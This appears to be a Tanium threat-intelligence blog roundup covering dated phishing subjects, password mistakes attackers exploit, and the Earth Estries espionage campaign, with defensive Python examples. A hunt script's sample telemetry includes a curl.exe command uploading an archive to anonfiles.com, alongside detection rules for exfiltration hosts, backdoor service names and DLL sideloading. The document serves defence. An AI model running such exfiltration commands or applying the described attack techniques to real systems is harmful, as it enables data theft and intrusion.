
CTI Roundup: Stop Making These Four Common Password Mistakes Now

Threat actors use misleading dates in phishing subject lines, four common password mistakes to avoid, and Earth Estries targets global governments and tech companies

Emerging Issue

In this week’s roundup, CTI investigates how threat actors are putting misleading dates in the subject lines of phishing emails to influence the emotions of their recipients. Next, CTI presents the four most common password mistakes users make, and how hackers can take advantage of them. Finally, CTI provides an update on the Earth Estries cybercriminal group and its latest cyberespionage campaign.

1. Threat actors use misleading dates in phishing subject lines

A recent Cofense blog reveals how threat actors are including misleading dates in the subject lines of phishing emails. The analysis also reveals some interesting trends in subject lines with dates in them and targeted subsectors.

The ratios of subjects containing dates vs. those without

The analysis began by looking at subjects that had dates of any format. This included subject themes related to late faxes, missed voicemails, overdue invoices, payroll, and other items requiring immediate attention. The number of emails with dates in the subject line varied based on the subsector.

The subsector with the highest share of dated subjects was rail transportation at 48%, closely followed by oil and gas at 45%. The subsectors with the lowest shares were real estate and wholesale trade at 13% each. On average, a subsector had a date in roughly 31% of its subjects.

Drilling down into these emails with dates in their subject lines, Cofense further separated them based on the dates themselves. The categories were based on the date in relation to when the email was accessed.

The first category, early emails, included messages where the date in the subject was after the day the email was accessed. The second category, on-time emails, included messages where the date in the subject matched the day the email was accessed. The final category, late emails, included emails where the date in the subject was before the day the email was accessed.

  • Early emails: Few threat actors sent emails with subject dates later than the day they were accessed. Early subjects made up only 2% of all subjects with dates in them. According to Cofense, most of these emails stem from threat actor accidents and misconfigurations.
  • On-time emails: Emails with subject dates matching the day the email was accessed were the second most common. Subsectors on average had 31% of their subjects with dates that were the same as the day the emails were accessed. These emails were the most customized, with 58% of the subjects having some sort of custom content, or PII requiring redaction. The most popular theme was action-oriented subjects, likely in an attempt to receive immediate action from the recipient.
  • Late emails: The most common category was emails whose subject date fell before the day the email was accessed. This likely serves to create a false sense of urgency, warning victims that a deadline has already passed and they are already late.
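The early/on-time/late split described above is easy to reproduce over your own mail telemetry. The following Python is an added example, not code from Cofense or Tanium: it extracts a date from each subject line, compares it with the day the message was accessed, and tallies the three categories. The subject lines and access dates are constructed for illustration, and the date formats are an assumption to extend for your environment.

```python
import re
from datetime import datetime

# Constructed sample data (not from the Cofense analysis): each entry is a subject
# line and the calendar day on which the recipient accessed the message.
SAMPLE_MESSAGES = [
    ("Overdue invoice #4471 - due 08/21/2023", "2023-08-23"),
    ("Missed voicemail from 2023-08-23", "2023-08-23"),
    ("Payroll adjustment required by Aug 30, 2023", "2023-08-23"),
    ("Quarterly newsletter", "2023-08-23"),
]

# Date shapes that commonly appear in subject lines; add more (regex, strptime) pairs as needed.
DATE_FORMATS = [
    (re.compile(r"\b\d{4}-\d{2}-\d{2}\b"), "%Y-%m-%d"),
    (re.compile(r"\b\d{1,2}/\d{1,2}/\d{4}\b"), "%m/%d/%Y"),
    (re.compile(r"\b[A-Z][a-z]{2} \d{1,2}, \d{4}\b"), "%b %d, %Y"),
]


def extract_date(subject):
    """Return the first parseable date in the subject as a datetime.date, or None."""
    for pattern, fmt in DATE_FORMATS:
        for match in pattern.finditer(subject):
            try:
                return datetime.strptime(match.group(0), fmt).date()
            except ValueError:
                continue  # right shape but not a real date (e.g. 13/45/2023)
    return None


def classify(subject, accessed_on):
    """Place a subject in Cofense's categories relative to the day it was accessed (YYYY-MM-DD)."""
    accessed = datetime.strptime(accessed_on, "%Y-%m-%d").date()
    subject_date = extract_date(subject)
    if subject_date is None:
        return "undated"
    if subject_date > accessed:
        return "early"
    if subject_date == accessed:
        return "on-time"
    return "late"


def summarize(messages):
    """Count how many subjects fall in each category."""
    counts = {"early": 0, "on-time": 0, "late": 0, "undated": 0}
    for subject, accessed_on in messages:
        counts[classify(subject, accessed_on)] += 1
    return counts


if __name__ == "__main__":
    for subject, accessed_on in SAMPLE_MESSAGES:
        print(f"{classify(subject, accessed_on):8s} {subject}")
    print(summarize(SAMPLE_MESSAGES))
```

Run against a month of reported phishing subjects, a "late" ratio well above the on-time and early ratios is the signature the Cofense analysis describes; the undated bucket is kept so the ratio of dated to undated subjects per subsector can be computed from the same pass.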

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“The key takeaway is that threat actors leverage dates in email subject lines to create a sense of urgency and elicit a response or interaction out of the recipient. This is not a new fact.”

“What is new is the breakdown of the date the threat actor chooses to use. It is interesting that most of these phishing emails use a date in the subject line from before you would open the email. This really toys with your mentality as your immediate reaction is that you missed something or forgot to do something.”

2. Four common password mistakes to avoid

Password security provider Specops has detailed what they believe to be the four most common password mistakes users make — and how hackers can take advantage of each.

According to Specops, these common password mistakes occur because our brains are good at pattern completion. This gives us a natural affinity for patterns that are satisfying or easy to remember.

Mistake 1: Common base terms

Users tend to look for a base word when creating a password. While a random base word may seem harmless, these base words are rarely truly random and hold more relevance than we often realize.

Users will often incrementally tweak the same base word during routine password resets/expiries to get around default password history requirements or complexity settings. Specops often sees users capitalizing the first letter of this base word and/or adding special characters to the end.

Threat actors know that they do not need to crack the strongest password as a way into an organization. Instead, they can crack a weak password and move laterally. They will exploit common base terms in an attack known as a dictionary attack, where they will use a predefined list of weak base terms to guess passwords. This attack is simple but often successful because people tend to use simple and familiar passwords.

A previous analysis by Specops of millions of passwords reveals the most common base term to be “password.” Some of the other common base terms include “admin” and “welcome.” Since we often use base words that have some relevance to our everyday lives, social media offers a goldmine for threat actors. Threat actors can use social media profiles to target specific individuals and can easily learn facts like birthdays, family names, pet names, and places of significance that may be used as a base word in a password.

Mistake 2: Short password length

Threat actors still face a lot of variation when trying to guess passwords — even those with weak base terms. They can use brute force techniques to iterate through potential password combinations until they discover the right password. Brute force attacks are particularly effective against short passwords, and even more effective on short passwords that start with a common base term.

Specops found that 88% of compromised passwords from their research were 12 characters or less. Enforcing a longer password length can be an effective defense against these attacks.

Mistake 3: Keyboard walk patterns

A less frequently talked about password mistake is related to keyboard walk patterns, which are essentially passwords inspired by the layout of a keyboard.

An example of this can be seen with the word QWERTY, which is an easy-to-remember “keyboard walk” for the user. Specops found that the pattern qwerty was identified over 1 million times in passwords, emphasizing how common keyboard walks are.

Even though keyboard walk patterns may not be real words, they can still be used in dictionary attacks. Threat actors are always trying to understand how and why people do certain things, so they can better capitalize and plan their attacks. Because keyboard walks are predictable, they are sometimes included in the list of probable passwords that are then used in dictionary attacks.

Mistake 4: Password reuse

Even strong passwords can be compromised, which becomes an even bigger issue if that same password is reused for different applications. Research indicates that 65% of people reuse passwords — a fact that threat actors know all too well.

Password reuse is a big part of why many threat actors focus on credential theft and the sale of these passwords, as a stolen password from one application could be exploited elsewhere.
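The four mistakes above map directly onto checks a password filter or self-service audit can run before a new password is accepted. The Python below is an added example, not Specops' product or code: it strips the usual decoration to expose the base term, enforces a minimum length, looks for runs of adjacent keys on a QWERTY row, and compares a hash of the candidate against a known-compromised list. The banned terms come from the figures quoted above; the 13-character minimum, the row-only keyboard model, and the compromised list are assumptions made for this example.

```python
import hashlib
import re

# Base terms the Specops summary above names as most common; a real deployment
# loads a much larger banned-word list.
COMMON_BASE_TERMS = {"password", "admin", "welcome", "qwerty"}

# Assumption for this example: since 88% of compromised passwords were 12
# characters or less, require at least 13.
MIN_LENGTH = 13

# Physical rows of a US QWERTY keyboard; walks are read forwards or backwards.
# Column walks (e.g. 1qaz) are not modelled here.
KEYBOARD_ROWS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm"]

# Constructed stand-in for a breached/previously used password list. In practice
# load SHA-256 (or NTLM) hashes from a file; never keep plaintext.
KNOWN_COMPROMISED = {
    hashlib.sha256(p.encode()).hexdigest() for p in ["Summer2023!", "Letmein1"]
}


def base_term(password):
    """Strip leading/trailing digits and symbols to expose the base word."""
    return re.sub(r"^[^a-z]+|[^a-z]+$", "", password.lower())


def has_keyboard_walk(password, min_run=4):
    """True if any run of min_run adjacent keys on one row appears in the password."""
    lowered = password.lower()
    for row in KEYBOARD_ROWS:
        for sequence in (row, row[::-1]):
            for start in range(len(sequence) - min_run + 1):
                if sequence[start:start + min_run] in lowered:
                    return True
    return False


def assess(password, compromised=KNOWN_COMPROMISED):
    """Return one finding per mistake detected; an empty list means none found."""
    findings = []
    base = base_term(password)
    if base in COMMON_BASE_TERMS:
        findings.append(f"common base term: {base}")
    if len(password) < MIN_LENGTH:
        findings.append(f"short: {len(password)} chars")
    if has_keyboard_walk(password):
        findings.append("keyboard walk")
    if hashlib.sha256(password.encode()).hexdigest() in compromised:
        findings.append("reused or previously compromised")
    return findings


if __name__ == "__main__":
    for candidate in ["Password123!", "Qwerty2023", "Summer2023!", "correct-horse-battery-staple"]:
        print(f"{candidate!r}: {assess(candidate) or 'no findings'}")
```

The base-term check is what catches the "capitalize the first letter, append a symbol" reset habit described under mistake 1: "Password123!" reduces to "password" and is rejected even though it satisfies a typical complexity rule.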

Analyst comments from Tanium’s Cyber Threat Intelligence Team

Good password hygiene has always been important, but it’s becoming even more so as the threat landscape continues to evolve. And until the whole world goes passwordless through emerging technologies like Entra ID, Duo, or KelvinZero, each of us has a role to play in protecting ourselves and our organizations through password hygiene.

The increase in the popularity of infostealers is a prime example of why we should be more cautious than ever when choosing our passwords. There is a lot of buzz about the future of authentication being passwordless, but it will likely take some time for this shift to occur. In the meantime, we can likely all improve (or at least be more mindful) when creating and managing passwords.

3. Earth Estries targets global governments and tech companies

The Earth Estries cybercriminal group has been attributed to a new cyberespionage campaign targeting government and technology industries in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. The threat actor is actively working with high-level resources and functions with sophisticated skills and experience.

Infection routine

  • Earth Estries compromises existing accounts with administrative privileges after successfully infecting an internal server.
  • The operation installed Cobalt Strike on the system before deploying additional malware and performing lateral movement. SMB and WMIC were used to propagate various backdoors and hacking tools to other machines in the environment.
  • The threat actor targeted PDF and DDF files for archival, which were uploaded to online storage repositories like AnonFiles or File.io via curl.exe.
  • Earth Estries regularly cleaned their existing backdoor after finishing each round of the operation, redeploying a new piece of malware when beginning another round.

Earth Estries backdoor and hacking tools

Earth Estries has been observed using various tools in this campaign including infostealers, browser data stealers, port scanners, and more.

Trend Micro covers the newly discovered and noteworthy toolsets from this campaign.

  • Zingdoor: Zingdoor is an HTTP backdoor written in Go that was first encountered in April 2023, though some logs indicate it has been around since mid-2022. Rarely seen in the wild, the backdoor is packed with UPX and heavily obfuscated. In this campaign, it was disguised as mpclient.dll and designed to run via DLL sideloading by abusing the Windows Defender binary MsSecEs.exe. It registers the current parent process as a Windows service named MsSecEsSvc for persistence, then connects to the C2 server and waits for commands. It is capable of gathering system information and Windows service information, managing disks, and running arbitrary commands.
  • TrillClient: TrillClient is an infostealer designed to grab browser data. It installs itself as a Windows service named “Net Connection,” creates a victim list based on the input victim ID, launches itself by starting the service, and cleans up the installation by deleting the service. It connects to a hard-coded GitHub repo to retrieve the command for its next actions. It can collect browser credentials and schedule a task to collect browser credentials.
  • HemiGate: HemiGate is a backdoor that is executed via DLL sideloading. It executes in three instances. The first instance is launched with no parameters and its main purpose is to install startup mechanisms and execute the second instance before terminating. The second instance is responsible for reading the config file and communicating with the C2 server before communicating with the third instance. The third instance executes a keylogger and receives/executes commands passed by the second instance.
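Several of the behaviours in the infection routine and toolset descriptions above (curl.exe pushing archives to AnonFiles or File.io, the MsSecEsSvc and “Net Connection” service names, mpclient.dll loaded by a copy of MsSecEs.exe outside the Defender install directory) are concrete enough to hunt for in endpoint telemetry. The Python below is an added example written for this roundup, not Trend Micro's or Tanium's detection content: it runs those checks over a handful of constructed events. The event shape, the sample paths and the list of legitimate Defender directories are assumptions; map the field names onto whatever your EDR or Sysmon pipeline emits.

```python
import ntpath

# Constructed sample telemetry (not real logs) in a simplified shape resembling
# process-creation, service-install and image-load events.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -F file=@C:\Temp\archive.rar https://anonfiles.com/api/upload"},
    {"type": "service_install", "name": "MsSecEsSvc",
     "image": r"C:\ProgramData\Update\MsSecEs.exe"},
    {"type": "image_load", "process": r"C:\ProgramData\Update\MsSecEs.exe",
     "module": r"C:\ProgramData\Update\mpclient.dll"},
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -O https://example.org/update.txt"},
    {"type": "service_install", "name": "Spooler",
     "image": r"C:\Windows\System32\spoolsv.exe"},
]

# Indicators drawn from the campaign description above.
ANON_SHARING_HOSTS = ("anonfiles.com", "file.io")
SUSPECT_SERVICE_NAMES = {"mssecessvc", "net connection"}

# Assumption: directories in which Defender's own mpclient.dll legitimately lives.
DEFENDER_DIRS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
)


def evaluate(event):
    """Return a description of the matched indicator, or None if nothing matched."""
    kind = event.get("type")
    if kind == "process":
        exe = ntpath.basename(event["image"]).lower()
        cmdline = event.get("cmdline", "").lower()
        if exe == "curl.exe" and any(host in cmdline for host in ANON_SHARING_HOSTS):
            return "curl.exe contacting an anonymous file-sharing service (possible exfiltration)"
    elif kind == "service_install":
        if event["name"].lower() in SUSPECT_SERVICE_NAMES:
            return f"service name '{event['name']}' matches Earth Estries backdoor persistence"
    elif kind == "image_load":
        module = event["module"].lower()
        if ntpath.basename(module) == "mpclient.dll" and not module.startswith(DEFENDER_DIRS):
            return "mpclient.dll loaded from outside the Defender directories (possible sideload)"
    return None


def hunt(events):
    """Run every event through evaluate() and return (index, finding) pairs for the hits."""
    hits = []
    for index, event in enumerate(events):
        finding = evaluate(event)
        if finding:
            hits.append((index, finding))
    return hits


if __name__ == "__main__":
    for index, finding in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {finding}")
```

The image-load rule is the most durable of the three: service names and file-sharing hosts change between rounds (the group redeploys a fresh backdoor each round, as noted above), but a Defender DLL name loaded from a non-Defender directory is a sideloading pattern that survives renaming of the payload.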

Victimology

Earth Estries focuses its attacks on government-related organizations and technology companies. Attacks have taken place in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the US.

Researchers also observed network traffic to C2 servers in Canada and toolset detections in India and Singapore.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“This campaign adds to the trend of threat actors abusing public services like GitHub, AnonFiles, and File.io as part of their operations.”

“The group seems to be rather sophisticated, leveraging several new backdoors and hack tools in its latest campaign. Trend Micro notes that Earth Estries focuses on cyber-espionage campaigns. With that in mind, its targeting of several countries across the globe is very broad.”


Tanium CTI

Tanium's Cyber Threat Intelligence (CTI) analysts process and extract trends from the daily cyber landscape to curate and deliver current intel to stakeholders around threats impacting business and security.